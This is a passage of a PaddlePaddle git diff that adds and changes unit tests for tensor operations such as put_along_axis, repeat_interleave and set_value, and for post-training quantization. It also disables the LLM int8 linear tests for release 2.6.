paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] = self.value[i, j, k] + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] = ( + self.value[i, j, k] + if self.value[i, j, k] + < self.target[i, self.index[i, j, k], k] + else self.target[i, self.index[i, j, k], k] + ) + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': False, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = ( + np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type) + ) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpMax(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "amax" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. 
+ self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] = ( + self.value[i, j, k] + if self.value[i, j, k] + > self.target[i, self.index[i, j, k], k] + else self.target[i, self.index[i, j, k], k] + ) + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'include_self': True, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = ( + np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type) + ) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpMaxNotIncludeSelf(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "amax" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] = self.value[i, j, k] + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] = ( + self.value[i, j, k] + if self.value[i, j, k] + > self.target[i, self.index[i, j, k], k] + else self.target[i, self.index[i, j, k], k] + ) + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': False, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = ( + np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type) + ) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + @unittest.skipIf( not core.is_compiled_with_cuda() or not core.is_bfloat16_supported(core.CUDAPlace(0)), @@ -274,6 +738,45 @@ def run(place): run(place) +@unittest.skipIf( + not core.is_compiled_with_cuda(), + "core is not complied with CUDA", +) +class TestPutAlongAxisAPILargeCase(unittest.TestCase): + def setUp(self): + np.random.seed(0) + self.shape = [64, 1327104] + self.index_shape = [64, 1327104] + self.index_np = np.zeros(self.index_shape).astype('int64') + self.x_np = np.random.random(self.shape).astype(np.float32) + self.axis = 1 + self.value_np = np.ones(self.index_shape).astype(np.float32) + self.x_feed = copy.deepcopy(self.x_np) + self.place = [paddle.CUDAPlace(0)] + + def test_api_dygraph(self): + def run(place): + paddle.disable_static(place) + x_tensor = paddle.to_tensor(self.x_np) + index_tensor = paddle.to_tensor(self.index_np) + value_tensor = paddle.to_tensor(self.value_np) + out = paddle.put_along_axis( + x_tensor, index_tensor, value_tensor, self.axis + ) + np.array( + np.put_along_axis( + self.x_np, self.index_np, self.value_np, self.axis + ) + ) + out_ref = self.x_np + np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001) + + paddle.enable_static() + + for place in self.place: + run(place) + + class TestPutAlongAxisAPICase2(TestPutAlongAxisAPI): def setUp(self): 
np.random.seed(0) @@ -468,13 +971,262 @@ def test_error(self): except Exception as error: self.assertIsInstance(error, RuntimeError) - # use includ_self=False - try: + def test_index_type_error(self): + tensorx = paddle.to_tensor([[1, 2, 3], [4, 5, 6]]).astype("float32") + indices = paddle.to_tensor([[1]]).astype("float32") + values = paddle.to_tensor([[2]]) + with self.assertRaises(TypeError): res = paddle.put_along_axis( - tensorx, indices, 1.0, 0, 'assign', False + tensorx, indices, values, 0, 'mul', True, False ) - except Exception as error: - self.assertIsInstance(error, ValueError) + + +@unittest.skipIf( + not core.is_compiled_with_cuda(), + "core is not complied with CUDA", +) +class TestPutAlongAxisAPIMulFloat32(unittest.TestCase): + def setUp(self): + np.random.seed(0) + self.dtype = 'float32' + self.x_type = "float32" + self.x_shape = (10, 10, 10) + self.value_type = "float32" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.random.randint(0, 5, (5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] *= self.value[ + i, j, k + ] + + def test_api_dygraph(self): + def run(place): + paddle.disable_static(place) + x_tensor = paddle.to_tensor(self.xnp) + index_tensor = paddle.to_tensor(self.index) + value_tensor = paddle.to_tensor(self.value) + out = paddle.put_along_axis( + x_tensor, + index_tensor, + value_tensor, + self.axis, + "mul", + True, + False, + ) + out_ref = self.target + np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001) + + run(paddle.CUDAPlace(0)) + + +@unittest.skipIf( + not core.is_compiled_with_cuda() + or not core.is_bfloat16_supported(core.CUDAPlace(0)), + "core is not complied with CUDA and not support the bfloat16", +) +class TestPutAlongAxisAPIMulBF16(unittest.TestCase): + def setUp(self): + np.random.seed(0) + self.dtype = 'float32' + self.x_type = "float32" + self.x_shape = (10, 10, 10) + self.value_type = "float32" + self.value = np.random.randint(1, 3, (3, 3, 3)).astype(self.value_type) + self.index_type = "int64" + self.index = np.random.randint(0, 3, (3, 3, 3)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + self.target = copy.deepcopy(self.xnp) + for i in range(3): + for j in range(3): + for k in range(3): + self.target[i, self.index[i, j, k], k] *= self.value[ + i, j, k + ] + self.xnp = convert_float_to_uint16(self.xnp) + self.value = convert_float_to_uint16(self.value) + self.target = convert_float_to_uint16(self.target) + + def test_api_dygraph(self): + def run(place): + paddle.disable_static(place) + x_tensor = paddle.to_tensor(self.xnp) + index_tensor = paddle.to_tensor(self.index) + value_tensor = paddle.to_tensor(self.value) + out = paddle.put_along_axis( + x_tensor, + index_tensor, + value_tensor, + self.axis, + "mul", + True, + False, + ) + out_ref = self.target + np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001) + + run(paddle.CUDAPlace(0)) + + +@unittest.skipIf( + not core.is_compiled_with_cuda(), + "core is not complied with CUDA", 
+) +class TestPutAlongAxisAPIMulInt32(unittest.TestCase): + def setUp(self): + np.random.seed(0) + self.dtype = 'int32' + self.x_type = "int32" + self.x_shape = (10, 10, 10) + self.value_type = "int32" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int32" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.randint(1, 5, self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] *= self.value[ + i, j, k + ] + + def test_api_dygraph(self): + def run(place): + paddle.disable_static(place) + x_tensor = paddle.to_tensor(self.xnp) + index_tensor = paddle.to_tensor(self.index) + value_tensor = paddle.to_tensor(self.value) + out = paddle.put_along_axis( + x_tensor, + index_tensor, + value_tensor, + self.axis, + "mul", + True, + False, + ) + out_ref = self.target + np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001) + + run(paddle.CUDAPlace(0)) + + +@unittest.skipIf( + not core.is_compiled_with_cuda(), + "core is not complied with CUDA", +) +class TestPutAlongAxisAPIMulInt64(unittest.TestCase): + def setUp(self): + np.random.seed(0) + self.dtype = 'int64' + self.x_type = "int64" + self.x_shape = (10, 10, 10) + self.value_type = "int64" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.randint(1, 5, self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] *= self.value[ + i, j, k + ] + + def test_api_dygraph(self): + def run(place): + paddle.disable_static(place) + x_tensor = paddle.to_tensor(self.xnp) + index_tensor = paddle.to_tensor(self.index) + value_tensor = paddle.to_tensor(self.value) + out = paddle.put_along_axis( + x_tensor, + index_tensor, + value_tensor, + self.axis, + "mul", + True, + False, + ) + out_ref = self.target + np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001) + + run(paddle.CUDAPlace(0)) + + +@unittest.skipIf( + not core.is_compiled_with_cuda(), + "core is not complied with CUDA", +) +class TestPutAlongAxisAPIMulUint8(unittest.TestCase): + def setUp(self): + np.random.seed(0) + self.dtype = 'uint8' + self.x_type = "uint8" + self.x_shape = (10, 10, 10) + self.value_type = "uint8" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.randint(1, 5, self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. 
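# As in the float32/bfloat16/int32/int64 cases above, this uint8 case exercises the
# positional call pattern used throughout these API tests,
#
#   out = paddle.put_along_axis(
#       x_tensor, index_tensor, value_tensor, self.axis, "mul", True, False
#   )
#
# which, judging from the matching OpTest attrs in this file, corresponds to
# reduce="mul" with include_self=True and broadcast=False; the loop below builds
# the multiplicative reference result accordingly.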
+ self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] *= self.value[ + i, j, k + ] + + def test_api_dygraph(self): + def run(place): + paddle.disable_static(place) + x_tensor = paddle.to_tensor(self.xnp) + index_tensor = paddle.to_tensor(self.index) + value_tensor = paddle.to_tensor(self.value) + out = paddle.put_along_axis( + x_tensor, + index_tensor, + value_tensor, + self.axis, + "mul", + True, + False, + ) + out_ref = self.target + np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001) + + run(paddle.CUDAPlace(0)) if __name__ == "__main__": diff --git a/test/legacy_test/test_repeat_interleave_op.py b/test/legacy_test/test_repeat_interleave_op.py index b2d0a12c6e260d..60d11a813263e5 100644 --- a/test/legacy_test/test_repeat_interleave_op.py +++ b/test/legacy_test/test_repeat_interleave_op.py @@ -252,6 +252,25 @@ def test_dygraph_api(self): expect_out = np.repeat(input_x, index, axis=None) np.testing.assert_allclose(expect_out, np_z, rtol=1e-05) + # case input dtype is bfloat16 + input_x = np.array([[1, 2, 1], [1, 2, 3]]).astype('uint16') + + with base.dygraph.guard(): + x = paddle.to_tensor(input_x) + index = paddle.to_tensor(index_x) + z = paddle.repeat_interleave(x, index, None) + np_z = z.numpy() + expect_out = np.repeat(input_x, index_x, axis=None) + np.testing.assert_allclose(expect_out, np_z, rtol=1e-05) + + with base.dygraph.guard(): + x = paddle.to_tensor(input_x) + index = 2 + z = paddle.repeat_interleave(x, index, None) + np_z = z.numpy() + expect_out = np.repeat(input_x, index, axis=None) + np.testing.assert_allclose(expect_out, np_z, rtol=1e-05) + # case 1: with base.dygraph.guard(): x = base.dygraph.to_variable(self.data_x) diff --git a/test/legacy_test/test_set_value_op.py b/test/legacy_test/test_set_value_op.py index 65c9f69765d116..c42026fb9caee1 100644 --- a/test/legacy_test/test_set_value_op.py +++ b/test/legacy_test/test_set_value_op.py @@ -1978,5 +1978,87 @@ def test_check_grad(self): self.check_grad_with_place(place, ['Input'], 'Out', check_dygraph=False) +class TestSetValueWithScalarInStatic(unittest.TestCase): + def setUp(self): + paddle.enable_static() + self.shape = (10, 2) + self.exe = paddle.static.Executor() + self.train_program = paddle.static.Program() + self.startup_program = paddle.static.Program() + + def test_value_input_is_scalar(self): + with paddle.static.program_guard( + self.train_program, self.startup_program + ): + x = paddle.ones(self.shape) + x.stop_gradient = False + y = x * 1 + + # mock test case x[0, 0] = 10 with no ValueTensor input + inputs = { + 'Input': y, + } + attrs = { + 'axes': [0, 1], + 'starts': [0, 0], + 'ends': [1, 1], + 'steps': [1, 1], + 'values': [10], + 'shape': [1], + } + + helper = LayerHelper("set_value") + out = helper.create_variable_for_type_inference(dtype=y.dtype) + + helper.append_op( + type="set_value", + inputs=inputs, + outputs={'Out': out}, + attrs=attrs, + ) + + np_data = np.ones(self.shape).astype('float32') + + paddle.static.append_backward(out.sum()) + res = self.exe.run( + self.train_program, fetch_list=[out, x.grad_name] + ) + + np_data[0, 0] = 10 + expected_x_grad = np.ones(self.shape) + expected_x_grad[0, 0] = 0 + + np.testing.assert_array_equal(res[0], np_data) + np.testing.assert_array_equal(res[1], expected_x_grad) + + +class TestSetValueWithScalarInDygraph(unittest.TestCase): + def setUp(self): + paddle.disable_static() + self.shape = (10, 2) + + def test_value_input_is_scalar(self): + x = 
paddle.ones(self.shape) + x.stop_gradient = False + y = x * 1 + + # mock test case x[0, 0] = 10 with no ValueTensor input + out = paddle._C_ops.set_value( + y, [0, 0], [1, 1], [1, 1], [0, 1], [], [], [1], [10.0] + ) + + loss = out.sum() + loss.backward() + + np_data = np.ones(self.shape).astype('float32') + np_data[0, 0] = 10 + + expected_x_grad = np.ones(self.shape) + expected_x_grad[0, 0] = 0 + + np.testing.assert_array_equal(out, np_data) + np.testing.assert_array_equal(x.grad, expected_x_grad) + + if __name__ == '__main__': unittest.main() diff --git a/test/legacy_test/test_sparse_fused_attention_op.py b/test/legacy_test/test_sparse_fused_attention_op.py index 68cdd16d4bd12c..098f4815b85f38 100644 --- a/test/legacy_test/test_sparse_fused_attention_op.py +++ b/test/legacy_test/test_sparse_fused_attention_op.py @@ -42,6 +42,7 @@ def get_cuda_version(): ) class TestSparseAttentionAPI1(unittest.TestCase): def setUp(self): + paddle.seed(0) self.batch_size = 16 self.num_heads = 16 self.seq_len = 128 @@ -134,6 +135,7 @@ def test_dygraph(self): class TestSparseAttentionAPI2(TestSparseAttentionAPI1): def setUp(self): + super().setUp() self.batch_size = 16 self.num_heads = 16 self.seq_len = 128 @@ -144,6 +146,7 @@ def setUp(self): class TestSparseAttentionAPI3(TestSparseAttentionAPI1): def setUp(self): + super().setUp() self.batch_size = 16 self.num_heads = 16 self.seq_len = 512 @@ -154,6 +157,7 @@ def setUp(self): class TestSparseAttentionAPI4(TestSparseAttentionAPI1): def setUp(self): + super().setUp() self.batch_size = 16 self.num_heads = 16 self.seq_len = 512 @@ -164,6 +168,7 @@ def setUp(self): class TestSparseAttentionAPI5(TestSparseAttentionAPI1): def setUp(self): + super().setUp() self.batch_size = 16 self.num_heads = 16 self.seq_len = 512 diff --git a/test/quantization/test_groupwise.py b/test/quantization/test_groupwise.py new file mode 100644 index 00000000000000..aef864fd2713bd --- /dev/null +++ b/test/quantization/test_groupwise.py @@ -0,0 +1,69 @@ +# copyright (c) 2023 paddlepaddle authors. all rights reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import os +import tempfile +import unittest + +import paddle +from paddle.nn import Linear, Sequential +from paddle.quantization import PTQ, QuantConfig +from paddle.quantization.observers import GroupWiseWeightObserver + + +class LinearDygraph(paddle.nn.Layer): + def __init__(self): + super().__init__() + self.fc = Sequential( + Linear(128, 128), Linear(128, 128), Linear(128, 128) + ) + + def forward(self, inputs): + out = self.fc(inputs) + return out + + +class TestPTQGroupWise(unittest.TestCase): + def setUp(self): + self.temp_dir = tempfile.TemporaryDirectory() + self.path = os.path.join(self.temp_dir.name, 'ptq') + + def tearDown(self): + self.temp_dir.cleanup() + + def _get_model_for_ptq(self): + observer = GroupWiseWeightObserver(quant_bits=4, group_size=128) + model = LinearDygraph() + model.eval() + q_config = QuantConfig(activation=None, weight=observer) + ptq = PTQ(q_config) + quant_model = ptq.quantize(model) + return quant_model, ptq + + def _count_layers(self, model, layer_type): + count = 0 + for _layer in model.sublayers(True): + if isinstance(_layer, layer_type): + count += 1 + return count + + def test_quantize(self): + ptq_model, _ = self._get_model_for_ptq() + inputs = paddle.rand([128, 128], dtype="float32") + out = ptq_model(inputs) + self.assertIsNotNone(out) + + +if __name__ == '__main__': + unittest.main() diff --git a/test/quantization/test_llm_int8_linear.py b/test/quantization/test_llm_int8_linear.py index 5a35b0d5124616..e4920f198f2c6f 100644 --- a/test/quantization/test_llm_int8_linear.py +++ b/test/quantization/test_llm_int8_linear.py @@ -15,12 +15,11 @@ import unittest import numpy as np -from test_weight_only_linear import convert_uint16_to_float, get_cuda_version +from test_weight_only_linear import convert_uint16_to_float import paddle import paddle.nn.quant as Q from paddle import base -from paddle.base import core from paddle.base.framework import default_main_program from paddle.framework import set_default_dtype from paddle.pir_utils import test_with_pir_api @@ -30,12 +29,7 @@ default_main_program().random_seed = 42 -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase(unittest.TestCase): def config(self): self.dtype = 'float16' @@ -149,12 +143,7 @@ def test_llm_int8_linear(self): ) -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase1(LLMInt8LinearTestCase): def config(self): super().config() @@ -162,12 +151,7 @@ def config(self): self.weight_dtype = "int8" -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase2(LLMInt8LinearTestCase): def config(self): super().config() @@ -176,12 +160,7 @@ def config(self): self.weight_dtype = "int8" -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and 
CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase3(LLMInt8LinearTestCase): def config(self): super().config() @@ -189,13 +168,7 @@ def config(self): self.weight_dtype = "int8" -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8 - or not core.is_bfloat16_supported(core.CUDAPlace(0)), - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8 or core is not support bfloat16", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase4(LLMInt8LinearTestCase): def config(self): super().config() @@ -203,12 +176,7 @@ def config(self): self.weight_dtype = "int4" -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase5(LLMInt8LinearTestCase): def config(self): super().config() @@ -217,13 +185,7 @@ def config(self): self.weight_dtype = "int4" -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8 - or not core.is_bfloat16_supported(core.CUDAPlace(0)), - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8 or core is not support bfloat16", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase6(LLMInt8LinearTestCase): def config(self): super().config() @@ -231,12 +193,7 @@ def config(self): self.weight_dtype = "int4" -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase7(LLMInt8LinearTestCase): def config(self): super().config() @@ -246,12 +203,7 @@ def config(self): self.token = 1 -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase8(LLMInt8LinearTestCase): def config(self): super().config() @@ -262,12 +214,7 @@ def config(self): self.token = 1 -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase9(LLMInt8LinearTestCase): def config(self): super().config() @@ -277,12 +224,7 @@ def config(self): self.token = 1 -@unittest.skipIf( - not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCase10(LLMInt8LinearTestCase): def config(self): super().config() @@ -293,13 +235,7 @@ def config(self): self.token = 1 -@unittest.skipIf( - not core.is_compiled_with_cuda() - or not core.is_compiled_with_cuda() - or get_cuda_version() < 11020 - or paddle.device.cuda.get_device_capability()[0] < 8, - "quantized_matmul 
requires CUDA >= 11.2 and CUDA_ARCH >= 8", -) +@unittest.skipIf(True, "Disable this unit test in release/2.6") class LLMInt8LinearTestCaseStatic(LLMInt8LinearTestCase): def config(self): super().config() diff --git a/test/quantization/test_post_training_quantization_mobilenetv1.py b/test/quantization/test_post_training_quantization_mobilenetv1.py index 4500f61ca13dc6..113b2cb066b915 100644 --- a/test/quantization/test_post_training_quantization_mobilenetv1.py +++ b/test/quantization/test_post_training_quantization_mobilenetv1.py @@ -25,6 +25,7 @@ import paddle from paddle.dataset.common import download +from paddle.io import Dataset from paddle.static.log_helper import get_logger from paddle.static.quantization import PostTrainingQuantization @@ -116,6 +117,33 @@ def val(data_dir=DATA_DIR): return _reader_creator(file_list, 'val', shuffle=False, data_dir=data_dir) +class ImageNetDataset(Dataset): + def __init__(self, data_dir=DATA_DIR, shuffle=False, need_label=False): + super().__init__() + self.need_label = need_label + self.data_dir = data_dir + val_file_list = os.path.join(data_dir, 'val_list.txt') + with open(val_file_list) as flist: + lines = [line.strip() for line in flist] + if shuffle: + np.random.shuffle(lines) + self.data = [line.split() for line in lines] + + def __getitem__(self, index): + sample = self.data[index] + data_path = os.path.join(self.data_dir, sample[0]) + data, label = process_image( + [data_path, sample[1]], mode='val', color_jitter=False, rotate=False + ) + if self.need_label: + return data, np.array([label]).astype('int64') + else: + return data + + def __len__(self): + return len(self.data) + + class TestPostTrainingQuantization(unittest.TestCase): def setUp(self): self.int8_download = 'int8/download' @@ -267,7 +295,7 @@ def run_program( throughput = cnt / np.sum(periods) latency = np.average(periods) acc1 = np.sum(test_info) / cnt - return (throughput, latency, acc1) + return (throughput, latency, acc1, feed_dict) def generate_quantized_model( self, @@ -284,6 +312,7 @@ def generate_quantized_model( batch_nums=1, onnx_format=False, deploy_backend=None, + feed_name="inputs", ): try: os.system("mkdir " + self.int8_model) @@ -293,11 +322,30 @@ def generate_quantized_model( place = paddle.CPUPlace() exe = paddle.static.Executor(place) - val_reader = val() + image = paddle.static.data( + name=feed_name[0], shape=[None, 3, 224, 224], dtype='float32' + ) + feed_list = [image] + if len(feed_name) == 2: + label = paddle.static.data( + name='label', shape=[None, 1], dtype='int64' + ) + feed_list.append(label) + + val_dataset = ImageNetDataset(need_label=len(feed_list) == 2) + data_loader = paddle.io.DataLoader( + val_dataset, + places=place, + feed_list=feed_list, + drop_last=False, + return_list=False, + batch_size=2, + shuffle=False, + ) ptq = PostTrainingQuantization( executor=exe, - sample_generator=val_reader, + data_loader=data_loader, model_dir=model_path, model_filename=model_filename, params_filename=params_filename, @@ -348,7 +396,12 @@ def run_test( model, infer_iterations * batch_size ) ) - (fp32_throughput, fp32_latency, fp32_acc1) = self.run_program( + ( + fp32_throughput, + fp32_latency, + fp32_acc1, + feed_name, + ) = self.run_program( model_path, model_filename, params_filename, @@ -370,6 +423,7 @@ def run_test( batch_nums, onnx_format, deploy_backend, + feed_name, ) _logger.info( @@ -377,7 +431,7 @@ def run_test( model, infer_iterations * batch_size ) ) - (int8_throughput, int8_latency, int8_acc1) = self.run_program( + (int8_throughput, int8_latency, 
int8_acc1, _) = self.run_program( self.int8_model, model_filename, params_filename, @@ -421,7 +475,7 @@ def test_post_training_kl_mobilenetv1(self): is_use_cache_file = False is_optimize_model = True diff_threshold = 0.025 - batch_nums = 1 + batch_nums = 2 self.run_test( model, 'inference.pdmodel', @@ -607,7 +661,7 @@ def test_post_training_onnx_format_mobilenetv1_tensorrt(self): is_optimize_model = False onnx_format = True diff_threshold = 0.05 - batch_nums = 2 + batch_nums = 12 deploy_backend = "tensorrt" self.run_test( model, @@ -650,7 +704,7 @@ def test_post_training_onnx_format_mobilenetv1_mkldnn(self): is_optimize_model = False onnx_format = True diff_threshold = 0.05 - batch_nums = 1 + batch_nums = 12 deploy_backend = "mkldnn" self.run_test( model, diff --git a/test/quantization/test_post_training_quantization_resnet50.py b/test/quantization/test_post_training_quantization_resnet50.py index ca87f17572a4c3..895b2f170084dc 100644 --- a/test/quantization/test_post_training_quantization_resnet50.py +++ b/test/quantization/test_post_training_quantization_resnet50.py @@ -113,7 +113,7 @@ def run_program( throughput = cnt / np.sum(periods) latency = np.average(periods) acc1 = np.sum(test_info) / cnt - return (throughput, latency, acc1) + return (throughput, latency, acc1, feed_dict) class TestPostTrainingForResnet50ONNXFormat(TestPostTrainingForResnet50): diff --git a/test/quantization/test_ptq.py b/test/quantization/test_ptq.py index 29ef308bd0b54e..2c6c21d472665f 100644 --- a/test/quantization/test_ptq.py +++ b/test/quantization/test_ptq.py @@ -128,6 +128,48 @@ def test_convert(self): self.assertIsNotNone(results) paddle.disable_static() + def test_convert_2times(self): + quant_model, ptq = self._get_model_for_ptq() + + image = paddle.rand([1, 1, 32, 32], dtype="float32") + converted_model = ptq.convert(quant_model) + converted_model = ptq.convert(converted_model) + out = converted_model(image) + self.assertIsNotNone(out) + + observer_count = self._count_layers( + converted_model, AbsmaxObserverLayer + ) + quanter_count = self._count_layers(converted_model, LinearQuanter) + dequanter_count = self._count_layers(converted_model, LinearDequanter) + self.assertEqual(observer_count, 0) + self.assertEqual(dequanter_count, 14) + self.assertEqual(quanter_count, 9) + + save_path = os.path.join(self.temp_dir.name, 'int8_infer') + paddle.jit.save(converted_model, save_path, [image]) + + paddle.enable_static() + exe = paddle.static.Executor(paddle.CPUPlace()) + main_program = paddle.static.Program() + startup_program = paddle.static.Program() + with paddle.static.program_guard(main_program, startup_program): + [ + inference_program, + feed_target_names, + fetch_targets, + ] = paddle.static.load_inference_model(save_path, exe) + tensor_img = np.array( + np.random.random((1, 1, 32, 32)), dtype=np.float32 + ) + results = exe.run( + inference_program, + feed={feed_target_names[0]: tensor_img}, + fetch_list=fetch_targets, + ) + self.assertIsNotNone(results) + paddle.disable_static() + if __name__ == '__main__': unittest.main() diff --git a/test/quantization/test_weight_only_linear.py b/test/quantization/test_weight_only_linear.py index 81f84f138e70b8..c7bbc1c6582676 100644 --- a/test/quantization/test_weight_only_linear.py +++ b/test/quantization/test_weight_only_linear.py @@ -399,5 +399,47 @@ def 